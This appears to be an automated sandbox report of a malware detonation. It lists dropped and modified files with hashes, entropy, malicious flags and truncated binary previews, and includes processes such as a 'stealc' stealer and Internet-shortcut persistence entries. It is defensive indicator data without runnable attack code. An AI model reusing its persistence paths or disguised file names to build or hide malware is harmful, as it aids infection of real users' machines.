                                                                                                                                                                          Preview:.....%.i...9.M.a....C.Qv.=.bN.NK..I*..Z.J.....mz..?QR."^.*..1.uO.x.*z.=...vo....uE...2..j.K.W.....P..i....*.......H.^..U.....W.X$.S.6.;..V.1.....~{.....7.o?].....L..$..w.N\`%.D.G..Pp.....g....6.....sA.D.f..\.........F.........U.p...."..{."Ym..`.ne.o.....h9....s...*~..pe[{..~.!.......A.#....YL........H...>......w_.5t6....\.bd..C..o<2.y.8-V.Dp..Jg...SH+.@.N0 q.n.M..(..X[...=k...6.._.]}.h..Q.G....l.M.@.JU.K.J....(...XXz......x...E.Gs<]....3.D.%O..)".,...K.Gtt...Y..b.<.S.v...R._......:i.;._.....c]/.N..T.`..+...h.)e............1..v S:..p.u.*&.....5.k$...ZS.g....3Ze.....P.....p..H.v.{..q..A..k._.+.g..d.m...v..$....R'_.6r4.......j..XsCxF.....#.0*........1.q...P....3C....3].8/(....@*...[~.@9E.]..bN_k...."..hF4.T....A^.J.%...p..1{/].....0.3Yw.'.,......X..^1.Z...=&:. .......E....7o..hdz%\.c.qE....&.[F...._.g'.|.I..;.[A..i.armG..+q......{q.+I&*.|..A+.......jq.'.J...uR........n.v...;`..8<J.D...r;.... ..D.jE..&.#G.{s6.].-...v..{.....N.l....E..H.......C.Y1.d...
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):7557
                                                                                                                                                                          Entropy (8bit):6.206282583817788
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:GHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3X:GHAHhww+/2nlP3r1WAL3X
                                                                                                                                                                          MD5:F3D7ABB7A7C91203886DD0F2DF4FC0D6
                                                                                                                                                                          SHA1:60FFBB095FCEEB2EA2B9E65355E9DBF1DE736D6C
                                                                                                                                                                          SHA-256:5867350B8AD8BB5D83111AED8B296B8C28328BA72B5BEDB0CBEB99B3DC600CB3
                                                                                                                                                                          SHA-512:9AF80787C63FA7DE9A22EEA3D1F13D25FF1558ED95321A8178DA734DCE5126F0B7322F13CDDD40C1BC67B65140F684A190DD117247F06600A07DB97B015AA367
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:CRAWFORDFILLEDVERIFYSCALE..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.....................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):59392
                                                                                                                                                                          Entropy (8bit):7.997208571345154
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:1536:WcKhUVngPRVt768UQOH96BBoYRoskvQIevMAVlXaR7ZQRu:EVt760O96BuYODQIev5XaR7ZAu
                                                                                                                                                                          MD5:84C831B7996DFC78C7E4902AD97E8179
                                                                                                                                                                          SHA1:739C580A19561B6CDE4432A002A502BEA9F32754
                                                                                                                                                                          SHA-256:1AC7DB51182A2FC38E7831A67D3FF4E08911E4FCA81A9F2AA0B7C7E393CC2575
                                                                                                                                                                          SHA-512:AE8E53499535938352660DB161C768482438F5F6F5AFB632CE7AE2E28D9C547FCF4ED939DD136E17C05ED14711368BDD6F3D4AE2E3F0D78A21790B0955745991
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...2.v..5.R.w&o(.9.A..B....g.b.'....3,m............Xo#.....}.".....{.......iT8d.g....W...q.?............[..........:r.k.....1....U.X.j(.c.....u..0....%2..[.<..`Bl.(.DW..@...7..P..m.E.......f.o.#c.Q.|.G....ke[.D.....^!.k..!..i.......".'..g.n.1..{...J..>G..3.[........%....fT\...O.SS..<.I_PF..E..9..t./..."ae..%.Q.wBI..t3../].#.vCQ>U...lx....B74( ........1..g..2l.k.1.X.......fq.5......m.[..oZ.....?....I.UU0n...>..VZ....J..(...).h.9..s...h...M]..t8._.i....d.NQ...Hr..O.R..G.rl.:....h...'.S...U.7.......6.....>.r:..d>.-..........T+...OA; y.Ynj.13w..u.R......{....5.j[..|.....t1.".)..L..l.=^.Z\.S6......sK.1.0>.....Q....X...O...^7'.....".Es.p.2...g.4....s..U..M'.3x.......jll.{E/...+B.5..=....PD....DH;A,h...7.._.....8....&.k.....>.?....z.g......*|...r..(....l...,...y...<....]....."+..@.s...:.......I]}+..XYm:.|ns...3...(.gmt..5m.x.....i....<..oF[..1..<...Fv.6.c3.<.^........!WO*`..o.....J~w...}....wt.ml....T1.....#".V.o..q...&...f......$.......d.u.9[..
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):81920
                                                                                                                                                                          Entropy (8bit):7.997700414089635
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:1536:UbTfzEhiJxYN/aeuU5rg6QJ7mrO+NMwViBsSRgucsmgcqtEyKNcHDrlzLbQCu+Em:UbTwhqypFuUKByrO+JiFgOmgceEydHDb
                                                                                                                                                                          MD5:0814E2558C8E63169D393FAC20C668F9
                                                                                                                                                                          SHA1:52E8B77554CC098410408668E3D4F127FA02D8BD
                                                                                                                                                                          SHA-256:CFDC18B19FE2C0F099FD9F733FE4494AA25B2828D735C226D06C654694FCF96D
                                                                                                                                                                          SHA-512:80E70A6EB57DF698FE85D4599645C71678A76340380D880E108B391C922ADADF42721DF5AA994FCFB293AB90E7B04FF3D595736354B93FCB6B5111E90B475319
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:,#.g.'....E.?9..>j.B1.xr...L].k5....<..n3.s1....[3.D...B.5u.1..9f...rS....H..x...[...j*[....2...sGH..>q.X+.dT..y.k..K..x.ya..Ra.0.)0.......Q..E}.6Y.'.`.u_.../`l%..\;..=...I..U 7..M@\.*v.J.....2...e.r.N..3.L..$.f.S.....OUp.>.%".l_?#.<T%..J...^2.H..=PY(...#MoK...+p...3{8.H...T.^.....i.}Yf..P....k7........QW.E&Vu]j.\.g]3d..U..`K>...u*...F.E/S.Qw;..j.d.CWL..0....)?."...lJ.......>....U...8.....]V.......1...(.Y./..=..&7T4Sh.....6..@.....././..qg+./J...7..c.#...^....N./.....9..39.Pt...62.+.....A.y.n!U1...V..<.J.n.^.s..D...k.......4'7.K.T{b...2M.h2.y.2B.ZF.~...........e.lnP..6#..~.v....B.qrh.K.:V^.o...^..}......7..pJ3.s....A.g.T..(..)V..7.y..I.GiC..~......c+.~u..4V!5...1..........b.8....C.,...eV....l:..=k...%*.-.....TI.|.."...!...f)..EV*0.....W71........h.h..&...../.u..c.@.. ..-h...'..].otw_\P..b.Hz....8L8!=-...V.2T...6.T.F&..a\.....Qt......#...b..4.q.$]....F.!HE.....h..P.....:\.r...R...@cd......1.d..8.....H.`v.....=:^.#...p......h#m.g.
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):72704
                                                                                                                                                                          Entropy (8bit):7.9974812887747095
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:1536:uKBvAKYhV7WXUiDJs3tfBOn4EdtDKA5w1+naRsk:uUAKgbaJs9fBODj5Fny
                                                                                                                                                                          MD5:6785E2E985143A33C5C3557788F12A2B
                                                                                                                                                                          SHA1:7A86E94BC7BC10BD8DD54ADE696E10A0AE5B4BF0
                                                                                                                                                                          SHA-256:66BBE1741F98DBB750AA82A19BC7B5DC1CDBECF31F0D9DDB03FF7CF489F318C7
                                                                                                                                                                          SHA-512:3EDAD611D150C99DBB24A169967CC31E1D3942C3F77B3AF2DE621A6912356400C8003B1C99A7236B6BED65BD136D683414E96C698EABD33D66D7AB231CDFEE91
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:v._.........6..O&.F...\^$..........-.%..xB.D.......".Y.i.O.e. Z..Z.U......,......~..Au..z.3.?..!...6.@.o..< ......D.9......E..Z7:!/.9}c.a.N1.[,8.g jO..[...w.^&A..u..aq..z-H....l..lIx .a...B....^...dP~3...S..V"...3.u..?....{...,o.EZ3..~B.j...."\9..7}l.G.............2....Fh....F|.LDF+.7....2..."gK ..H.fO[..)......../...X..M...c..FV&S=..W]}..v.].b..P...?{.G.e.g.G..^;s0+.hB....U.LN-..l..G.zn.....t....Y.\.s....9.P..2Y...u{.bd.C..../t<t.."^..3[..........#B.w...5...rH..?.oo..|.....T..u.\g.......G..%.v.E9c...5sZ;i)...y q_.Gp;...|t. ........P...`..K.+....f....'..Jz./.....w....6l.c..R..A.N...oM..F.A....F....n.-9M...@:..C.......t..=w.Q....E..>.g{.....Z..dP;...1....rBts3@6.^..RM.Aq;8>.<..Qr.:.c..q.v.Z{...2..E.I.Jm .Q.vIci~kE.i4.......\...85m R...u...,.sE..k........O.0..$.b.5..."!}..,H}.A....{..#x.1>?.Y1..L8}n.p<.V5...]n...v....7.wZ.y.%]G8|....UX...$.......A.'.T...jf..71..x......(.Y..1..P.h]m.lT..\.....PX.=y_DE7..........a.J.,J.._..d^!..!....O...SA9.W8^...)
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):886078
                                                                                                                                                                          Entropy (8bit):6.6221717879410384
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:2V0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:cxz1JMyyzlohMf1tN70aw8501
                                                                                                                                                                          MD5:6CEE6BD1B0B8230A1C792A0E8F72F7EB
                                                                                                                                                                          SHA1:66A7D26ED56924F31E681C1AF47D6978D1D6E4E8
                                                                                                                                                                          SHA-256:08AC328AD30DFC0715F8692B9290D7AC55CE93755C9ACA17F1B787B6E96667AB
                                                                                                                                                                          SHA-512:4D78417ACCF1378194E4F58D552A1EA324747BDEC41B3C59A6784EE767F863853EEBAFE2F2BC6315549BDDC4D7DC7CE42C42FF7F383B96AE400CAC8CF4C64193
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.j.^3.;.~...$xL....98u#h.....[...Y..t..............3..F;.|...U..V.u.W....t$j.V..\.I.;Gxs..Ot.......t.91u._^]........U..V.u.W....t$j.V..\.I.;Gds..O`.......t.91u._^]........U..QS3....wL.....V3....wL.@...wL.W.....wL...wL...wL....wL...wL....wL....wL..=.wL....wL....wL....wL....wL.....j.^j|Xf..wL.3....xL.h.I....xL....xL....xL..=.xL... xL.l.I...$xL...(xL...,xL..50xL...4xL.......8xL...<xL...@xL..=DxL..=HxL...|xL....xL....xL..=.xL.f..wL..2.......~....]..E.. xL.P....Nu._^..wL.[..].V......|xL.....c....%.xL....8xL.....b....%@xL... xL........xL........wL........wL.....D...^.U...(SVWh.....*...Y....A......^........xL..}..M.9..wL........E...P..xL.......}....xL..].....8..xL.......p....u.........................................E @....#E .E..@......E..E .E..E..}..............}...........u-j..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E..} .uFj..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E ....@.t.j...X.I.j..Y...E .u..E..u.j.j.P....I..u..E.j.SP....I..E.+E.j..5.xL.j..u$P.E.+E.P.u .u.S.u.h..I..u... .I.
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):315803136
                                                                                                                                                                          Entropy (8bit):0.05436016052786444
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:fm5h+BW/VcVpItvUNQJHnnPP4IPuYq1SWUnpOsPsWaPa59lIxYGXnsGcA6D9q:OYIWaWUn/PWXsGB
                                                                                                                                                                          MD5:3686F9BA083257B99BFFC8190E7D85B6
                                                                                                                                                                          SHA1:87AE54B9D6E3558CCF3906A1A6723F7E010BFB73
                                                                                                                                                                          SHA-256:CDC1826EEFB108B6265C4D5F627468623EC7CC55B845914094FF47EF3355DEFF
                                                                                                                                                                          SHA-512:CF0BCC704E121F9D4E3254E19805D0B0E00DF04A04EB6D9073AC7299C849BADCC704C2B640D05659637043C88BCC7C99861D7E4D9F048ED3529F33FD68995F1F
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y"g...........#...(...........................f.........................@......F.....@... .........................`.......................................@z...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..@z.......|...J..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):97280
                                                                                                                                                                          Entropy (8bit):7.998072949966149
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:BA8C4239470D59C50A35A25B7950187F
                                                                                                                                                                          SHA1:855A8F85182DD03F79787147B73AE5ED61FB8D7B
                                                                                                                                                                          SHA-256:A6272116DC959A3197A969923F85C000A1388B0A02DF633DEC59B7273BDB421B
                                                                                                                                                                          SHA-512:1E6D42C249D206815000CC85D5216D13729246E114647D8CCF174B9BD679530B6B39DFAB2BFCC5D957CC0778A8CF029E544228978682FA285C5E3F9564C2EAF0
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:A@2..3Y.....8p.!..L.[...`..b..f^..J....P@....;.:.."....g...Tz.....T%.R.G.....0$.....n.....r0....R-A..z.N..jK...y.....;.EWs.@b....{....Y9p.)J.....s ;..9.j.........X.K..|...e..i...`.c..U.h..%...[..b.....n..:Y....M........W>H.....?..O.[......{...7.....C/.!0..|[&....f.q......}..Q.....+-o.y./T...%..K...vl;4..z*."...k:..2[.v.o..{..c5...%...:..kZU1.J?..TI...!...\3_..&L.[{..4..G>..;.%..'...6.q..2....V_.^.....R...g.......<..%.5.j..3.-.o.aj..............j.8aw.6_e}....Z".WLw"S...,....'..6...P.=..xckw}......b..K..h..ad....m{&h...;.o.yR*..9.....Q..E.b.....2m..E.r.N..8.u.Q4.m..ht.ck.&f.g...$.....3by..B.V1#.G..y..IL.j......2...\..A..^..T.5....+...W=.Z.[.z....X`.&..z.h...B....|xs..H&X..Nv..k.5.s.Z...:~9.V.M.PO&.@..m....P.K......".Ju..?.._:%qp.ON..q.....c.AN$N..-MB.q..-.hz.+..O.B.+<~...f..V..5.C"EY..=D..|.....;.e.|.g.0.^i..f.._e:...0/.....'.[......*...A.1.RY.6}..l.Kf....$.7.N...[ml.W......[.$...p..[H>.+....}.H.....\H2[.'.p......./..z.@...J....*-....
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):94208
                                                                                                                                                                          Entropy (8bit):7.9982397133011816
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:2759C67BCCD900A1689D627F38F0A635
                                                                                                                                                                          SHA1:D71B170715ED2B304167545AF2BD42834CCF1881
                                                                                                                                                                          SHA-256:510CFD9523A0F8462E8CBDCBBF1AFCCF2AA69A9153472EE48FD28AD4FE06CA05
                                                                                                                                                                          SHA-512:AA9E26AD8824ED2CA8BF45C24939E305660CBC19F821A84A7407A16F91D71B2EB9DABA9059D379908F17C9E5A17C0C3E873E5CD7350EE8715E45B2B3EFF2531E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:5......Z..%*D^..|.....8.6[...8{......ZG.%.80.K[Xd...........56!.>...b9.T.m).mYm.cZ..cy..jC...65.....m+.~.......cl..Ot8..6.t..._=.Q.5..l\.r..>b#.........DU....1... 4.|k.L.U\......;...D...M^.B...R)D.2...<.T....<GW+..I.....M[...z...k.s..[G].]..d?.o..t._.6h....R.....H..+.uK.i.A..%/..)u..*o7%u!x..G.:...jA.F...q......[k....r...u.h.....5_..}Q.;...W.?...Q_......>..x\..dG..;.*..r......E...R.hq.......X..:..`.j]2s.L...i..)../..q..?.."....*...h;....')....;...J..l+...7...!.D...g.X.u.......uH..;gj..l.{.~7......\..k.S8...*...O..W.....v..A..C.Bo...z9.2B.."....`.%J Zv.../..I.....WW.l.O..,.@2].if.2....{m.{.i.Q.....j..y....td.}!....".........=.......5..T}0b.....HM.3.f.yA..........-cG..+...G.[`..........DN..".....|..PU..DOr...lq/..#c....L.......4..6.X.}..KdI.o....;t...DL!.c... ...E..""..@m.m.(E..[]..x.z.......l..........'.......!....t....F......#./........\j...0.A...../a.o..%+..$..[4H.I..;.]:...o+a{Bi.'%C.~...J..^,X6...VNp........:m..e._.U.$.....As2C1<....@G..+.w
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):54272
                                                                                                                                                                          Entropy (8bit):7.996566915559803
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:79156AFDDD310BE36F037A8F0708A794
                                                                                                                                                                          SHA1:09EF36AE22B5EAB65D1F62166542601B8919399D
                                                                                                                                                                          SHA-256:7FAAF10D09A27842330725E6510D2754487C5B69BD40E11181DD75B03DF61503
                                                                                                                                                                          SHA-512:D1449126F2365F607A390E3B6FECB3BE100BFF9FAE1A773CF5815CAB29EEB72AB4E341022BDE9DE653FD62EDE0FB0C26D9010E524D87060AA364BF92A14E9D01
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:...... WO.+|`}....D.6.0.n..l&(..*..mz....3!.d...[..CmK...e.?....1x>I..:MNG).t.......g.4.5^..~....S.-p.b..g..@:.c.%GA}6K........9O.U.L(.\:..!.Y....8....p.se..g..|.}.....2.W....s....?Qt.N.-O.d(.#..P....#Q.WQ..U............?3~7[........AI...h.|.2"o..:...}.'T..1........(.8zU.1.m....tfxM..........Gk..1...i....f.eFe.W.+O...Q._ELT...R.h.4....c7.~.....d....V.(%O..b..r.@........m|...:S. y{..[J..\!.`....%..W' .X.8..^..70.m.4.dy<....=.sG.@I....Y.Z'\.bz.jq..?z..3..6 -z..bha.V.(..^.....&...q{.GYU..#s..}...[.B.r.....[.oH...).48...+.....LB. .4...\..xM..........7.............(....r0J..t....8.P....28.r..=....'+..J n..d2k..*Cl....&..J>...8..s...'.st..}..`.y.._.......L...|p..D....r.i.x..+.Z....Y3?.......l.....r..6xbh..=..S........^.>2....d.=%.X..#....".9.S..tF.c.......Db.....c=he8U..3..1..z}..iD+.}!Q..hE..KiE..@.6...@.#kg3R....b.*.p.... .?..8..i+.........}.....wP....].og.-.20}N..j=..!.i._m......U.....Z...S6.;....*.?,.y...8(.>...b.u........}....
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):314617856
                                                                                                                                                                          Entropy (8bit):0.00234060222691118
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:B8D21AF3D6E1A2EF093FF5B8C354FE9C
                                                                                                                                                                          SHA1:F7A608A73B414C47BE37D0CD646F252368BF03E8
                                                                                                                                                                          SHA-256:6C51EBCE930F7DFC2E2B7DC58B48399B2173F18DDD720DC14DA7C5D15D58D46F
                                                                                                                                                                          SHA-512:5AF6C5997AFEC6190C0EB5D33A1CEB924E1D0BF22F4DF55E416BEF8C8483A8F691B3915C05BFE099647C6495FD48E85586A94C7430F9D4BFC813BA5CA21FAACB
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y"g...............(.v........................@.......................... ............@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >), ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):95
                                                                                                                                                                          Entropy (8bit):4.923848015808376
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:CF058F0E0C0886F52CDE9D176F3329FA
                                                                                                                                                                          SHA1:7A635726AA6C968DF4054BD920C2F4AF33216C82
                                                                                                                                                                          SHA-256:34A122E4A7AF968B4854F5D1FD6A0601D284B850FA1A4324F86A59DD11151419
                                                                                                                                                                          SHA-512:BDF04F66015A7E2168AC9212AC539BE9C7009E49DAE5CB9CFE5B25EFBF24A13F3D49AC3A0655AD0328B0AA311E26A5298BBFD6226D9686FBAC5967D9BC02863E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" ..
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe
                                                                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"C:\ProgramData\LgAmARwZ\Application.exe">), ASCII text
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                          Entropy (8bit):4.835479296672176
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:76F433B3FBD6C3D0CA94F50293292ECC
                                                                                                                                                                          SHA1:55CECBED8CB353B05CE046AD185488FBCB91BED8
                                                                                                                                                                          SHA-256:B04B8AD6F41D55D715FEE227F2C1E4D333627FF2A1B89C0F55E35384028F1B32
                                                                                                                                                                          SHA-512:829F24BD3474ABB436D4F685FC6EC8172B1D3AD548CFA71B3CD263B0A3FC353AE4CDD0AB925397FDB07BFA859E79711A6C0B7DBDD95B94B419FEDCE60090BDB6
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:[InternetShortcut].URL="C:\ProgramData\LgAmARwZ\Application.exe"
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):55
                                                                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):2464
                                                                                                                                                                          Entropy (8bit):3.249921021394619
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:572B1014D07A195B79C2FBB8E0C2830F
                                                                                                                                                                          SHA1:1509E21481A4CE6B36EB4C0C0F44B840C41E32CD
                                                                                                                                                                          SHA-256:D2A270D957C9F242A833F93206BFFD39E7406CC22A87DE936720C16DB96D5A10
                                                                                                                                                                          SHA-512:499DB2894AE1629CCAFE0DF4457238AA1378A377F996B5CB26CE8F52DB46943F71ED06DA577785D95CB63766FD0638C4196098DBA16742303E99C84485F1CE9C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. N.o.v. .. 0.1. .. 2.0.2.4. .0.1.:.2.3.:.0.6.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):308
